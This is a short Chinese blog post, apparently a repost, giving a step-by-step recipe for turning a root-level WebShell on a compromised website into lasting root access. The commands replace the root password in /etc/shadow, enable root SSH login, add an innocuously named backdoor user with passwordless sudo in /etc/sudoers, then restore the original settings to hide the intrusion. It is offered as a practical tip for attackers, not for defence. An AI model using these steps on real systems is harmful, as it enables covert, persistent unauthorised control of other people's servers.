没啥技术含量,一种思路,让某些得到Root权限WebShell的同学可以快点拿到权限。
某日拿到某站WebShell,RedHat(红旗linux)系统,Tomcat程序是Root身份启动的,WebShell当然也拥有Root权限。
具体提权思路:
1.WebShell直接替换Root密码:/etc/shadow //记得备份
2.允许Root通过ssh登陆:
修改:/etc/ssh/sshd_config
PermitRootLogin yes #允许Root登陆
3.重启ssh服务:service ssh restart
4.以Root身份登陆ssh,增加一个用户:
useradd application
passwd //根据提示设置密码
5.更改application用户运行su不需密码:
chmod +w /etc/sudoers //增加写入权限,默认只读
修改:/etc/sudoers
vi /etc/sudoers
加入:application ALL=(ALL) NOPASSWD: ALL
6.把Root密码修改回原样,禁止Root登陆。并去除sudoers的写属性(chmod -w /etc/sudoers)。
7.当然最后还要:chmod -w /etc/sudoers
本文转自 ☆★ 包罗万象网 ★☆ - 转载请注明出处,侵权必究!
原文链接:
阅读(1318) | 评论(0) | 转发(0) |
